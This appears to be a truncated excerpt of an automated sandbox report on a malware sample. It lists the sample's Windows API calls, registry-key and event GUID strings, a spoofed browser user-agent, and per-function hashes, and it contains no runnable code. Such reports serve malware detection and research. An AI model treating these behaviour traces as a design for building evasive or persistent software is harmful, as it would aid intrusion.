                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocalund_memcpy$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616075706-0
                                                                            • Opcode ID: d21baedd2bd788e4408c49b74358b08db4af1dca9fb56c12945d572a86370914
                                                                            • Instruction ID: 8372f3d8bfaf64c20ea03ff88c58980119dec020ac493067dbe29cefd1016f9c
                                                                            • Opcode Fuzzy Hash: d21baedd2bd788e4408c49b74358b08db4af1dca9fb56c12945d572a86370914
                                                                            • Instruction Fuzzy Hash: F971D0B5A00228DBCB64DF54DC88BEDB7B5AF98305F1481D9E50DAB351DA34AEC18F40
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 007DC24A
                                                                            • CreateThread.KERNEL32(00000000,00000000,007DC360,00000000,00000000,00000000), ref: 007DC291
                                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 007DC2EB
                                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 007DC302
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC311
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC31B
                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 007DC336
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC340
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC34A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalThread$CloseFreeHandle$AllocCodeCreateExitMultipleObjectsTerminateWait
                                                                            • String ID:
                                                                            • API String ID: 872497719-0
                                                                            • Opcode ID: cadcb689f2778f64120627e94912597bbddc197cee1b67432eefdec330d2e18e
                                                                            • Instruction ID: 29422f9d9396c758c7828d61037d7fc0071725b320a0669755bf1d88398f3b1c
                                                                            • Opcode Fuzzy Hash: cadcb689f2778f64120627e94912597bbddc197cee1b67432eefdec330d2e18e
                                                                            • Instruction Fuzzy Hash: D541C479A00208EFCB04DF94D984BADBBB6FB48300F208159E905A7395DB38AA41CF54
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(000002EC,00000000), ref: 007C4822
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C48A9
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C4ADE
                                                                            • WaitForSingleObject.KERNEL32(000002EC,00001388), ref: 007C4B8C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C4BED
                                                                            Strings
                                                                            • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, xrefs: 007C499C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$ObjectSingleWait
                                                                            • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                            • API String ID: 1287375803-4002695862
                                                                            • Opcode ID: 09502354b80a4e01c2ea8c6f4c3940405026bb835f2da2159c2a50810eef8f6c
                                                                            • Instruction ID: b934d2b78fe0edf30331b7e6554572c49b7993251e60d14d3080beb07a3f32dd
                                                                            • Opcode Fuzzy Hash: 09502354b80a4e01c2ea8c6f4c3940405026bb835f2da2159c2a50810eef8f6c
                                                                            • Instruction Fuzzy Hash: 58C13AF1E01209CBDB08CF81C5A9BADBBB1FBE4304F25826DD60AAF295C7795945CB44
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,007D720B,?), ref: 007D74EB
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7523
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7543
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007D720B,?), ref: 007D755B
                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 007D757A
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D75A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 3200977696-2564639436
                                                                            • Opcode ID: 7cf1aa88d3450927a9d332d2d8773acf970e86653187f977dec44143f0ee9c4b
                                                                            • Instruction ID: b6d39b817c69e4e90b568c62372dcf41fc11d475e2f1c61d607b550a052589ab
                                                                            • Opcode Fuzzy Hash: 7cf1aa88d3450927a9d332d2d8773acf970e86653187f977dec44143f0ee9c4b
                                                                            • Instruction Fuzzy Hash: 59315AB4A04209DFDB18CF94D888BAEB7B2FF48304F24C559E51667390D779A981CF90
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CE08F
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CE0CA
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CE0DD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CE0E7
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CE0F3
                                                                            • closesocket.WS2_32(?), ref: 007CE0FD
                                                                              • Part of subcall function 007CB6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB70C
                                                                              • Part of subcall function 007CB6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                              • Part of subcall function 007CB6D0: __snwprintf.LIBCMT ref: 007CB74E
                                                                              • Part of subcall function 007CB6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB77C
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007CE0BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CreateErrorEventFreeLast$AllocCloseDirectoryFileHandleOpen__snwprintfclosesocketsetsockoptshutdown
                                                                            • String ID: {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1062739783-1105423733
                                                                            • Opcode ID: ae8cc7b1a1b97274811e55293f59ceaf0f15c06f7b9e7d2fd96cb452f7b7c384
                                                                            • Instruction ID: 4b6515c9c92e369362f7fb32fff265ac2d8a9893d526cd8ef6606be19b1b4315
                                                                            • Opcode Fuzzy Hash: ae8cc7b1a1b97274811e55293f59ceaf0f15c06f7b9e7d2fd96cb452f7b7c384
                                                                            • Instruction Fuzzy Hash: 9231FC70A00218EFDB24DFA4D849FADBBB5FB88700F208A2CF510A7291D7B59944CF91
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007C4331
                                                                            • OpenEventW.KERNEL32(00000002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007C4383
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C4396
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C43A0
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C43D8
                                                                            • ResetEvent.KERNEL32(00000000), ref: 007C43FB
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007C437A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseHandleObjectOpenResetSingleWait
                                                                            • String ID: {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1560999653-1105423733
                                                                            • Opcode ID: 92a44ad34f10796bd761c3fb333e1ad406df70590571cc3fadc5aa820665e1ea
                                                                            • Instruction ID: 9a1b950ceb8f74ad94c50f2947eb4bd93f31aaa3660083f696fbc6a9d389f10b
                                                                            • Opcode Fuzzy Hash: 92a44ad34f10796bd761c3fb333e1ad406df70590571cc3fadc5aa820665e1ea
                                                                            • Instruction Fuzzy Hash: 98217F31901390DBCF38ABA4E96DF6D7BB8B7D1316F20191DF901A2160CB7E9995CB11
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D6B10,00831178,007D6B10), ref: 007D0023
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D0034
                                                                            • wnsprintfW.SHLWAPI ref: 007D005F
                                                                            • lstrlenW.KERNEL32(?), ref: 007D0070
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D007F
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D008E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 1665550476-4073750446
                                                                            • Opcode ID: 8599fc334abc58fb5dd47b3fb2c94af31518b4cd199ff9e6d1890bef1c3695b5
                                                                            • Instruction ID: daa36a3c19c2172e3c39ba5e9409cfc7c9159ec3af4b6691df99f1b47c8caa7c
                                                                            • Opcode Fuzzy Hash: 8599fc334abc58fb5dd47b3fb2c94af31518b4cd199ff9e6d1890bef1c3695b5
                                                                            • Instruction Fuzzy Hash: B7012D74A00208FBDB14DFA4DC4ABAEBBB9EB44701F108465FA05E6280D6789A41CBA4
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007C478F
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C47A7
                                                                            • RegSetValueExW.ADVAPI32(?,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000000,00000003,?,?), ref: 007C47CA
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C47D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue__snwprintf
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 2100281157-3800169908
                                                                            • Opcode ID: 3a1f86d9474d83b3e543c37c390807a112eb2264c025a1fb1711f95864d6e53b
                                                                            • Instruction ID: 42289d288585e806e0345cb78000611abb84ed5ff04802c1e8ba1375fa65ae4e
                                                                            • Opcode Fuzzy Hash: 3a1f86d9474d83b3e543c37c390807a112eb2264c025a1fb1711f95864d6e53b
                                                                            • Instruction Fuzzy Hash: 11016779604208FBD714DBB4DC99FAA7368FB48700F10495CBA05D6180E679DA0097A0
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 007C9E57
                                                                            • __snwprintf.LIBCMT ref: 007C9E7C
                                                                            • RegGetValueW.ADVAPI32(80000001,?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000002,00000000,00000000,00000208), ref: 007C9EA8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9EC7
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007C9E66
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007C9E97
                                                                            • SOFTWARE\%s, xrefs: 007C9E6B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFreeValue__snwprintf
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3906065898-923683513
                                                                            • Opcode ID: e4fb720acc45f26297d60d4a2f65fb21672ef3c397cadcb88a92ab034063a73c
                                                                            • Instruction ID: e043fe1eee88c6e1866da1b7f64b518c5d2ed1e59dd630e64b6b668af8016bae
                                                                            • Opcode Fuzzy Hash: e4fb720acc45f26297d60d4a2f65fb21672ef3c397cadcb88a92ab034063a73c
                                                                            • Instruction Fuzzy Hash: 29017171A44208FBEB10DBA4DD4EFAEB7B4FB58700F104998B604E7281D6B45B409B90
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007DE862
                                                                            • und_memcpy.LIBCMTD ref: 007DE888
                                                                            • und_memcpy.LIBCMTD ref: 007DE8A3
                                                                            • und_memcpy.LIBCMTD ref: 007DE8D7
                                                                            • VirtualProtect.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 007DEAE5
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DEBAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 3065580769-0
                                                                            • Opcode ID: 8a64a8bd4ec99043d1064bdf4de021af2f293a3e42271a9b681c80310f060139
                                                                            • Instruction ID: 51ad7eb8a2b1a00bd436f0f1bc974935258dcc71cd7257ef75d4c457ab17031a
                                                                            • Opcode Fuzzy Hash: 8a64a8bd4ec99043d1064bdf4de021af2f293a3e42271a9b681c80310f060139
                                                                            • Instruction Fuzzy Hash: E5A1C270A01129CBDB69DF04CD85BEAB7B1BB98305F1481DAD44DAB354D739AE81CF80
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C72DB
                                                                            • _memset.LIBCMT ref: 007C732B
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C7595
                                                                            • closesocket.WS2_32(?), ref: 007C759F
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crt_memsetclosesocketsetsockoptshutdown
                                                                            • String ID: $#
                                                                            • API String ID: 2801799075-2491617062
                                                                            • Opcode ID: f5f824da3953bfa382c1cbfc1d7b47cd430aa88c4c87e0cb949d9c788cb5930e
                                                                            • Instruction ID: 5d628541e117bb2cd87dd054e84387c72ef7331f95acc9c1d0f47578d2eb92cc
                                                                            • Opcode Fuzzy Hash: f5f824da3953bfa382c1cbfc1d7b47cd430aa88c4c87e0cb949d9c788cb5930e
                                                                            • Instruction Fuzzy Hash: CF811AB090421DDFEB24DF50D949BEEBBB5FB44304F2082D9D5486B281D7BA5A88CF51
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C9164
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C919C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C91D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C9222
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C928C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: b65852fbe9d54750713c1503c70ce0a7a21f1c5f6e4f8ef19c295bcfc4db13f9
                                                                            • Instruction ID: 2a6a90f9630ad0a99c7db4323816f6992395b7328754a1ecb6c125ee3260af1a
                                                                            • Opcode Fuzzy Hash: b65852fbe9d54750713c1503c70ce0a7a21f1c5f6e4f8ef19c295bcfc4db13f9
                                                                            • Instruction Fuzzy Hash: F8518171A00619EBEB18DF84C99EFAEB776FB90304F14426CD1166F681C739EA41CB41
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C6932
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C696A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C6987
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C69D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
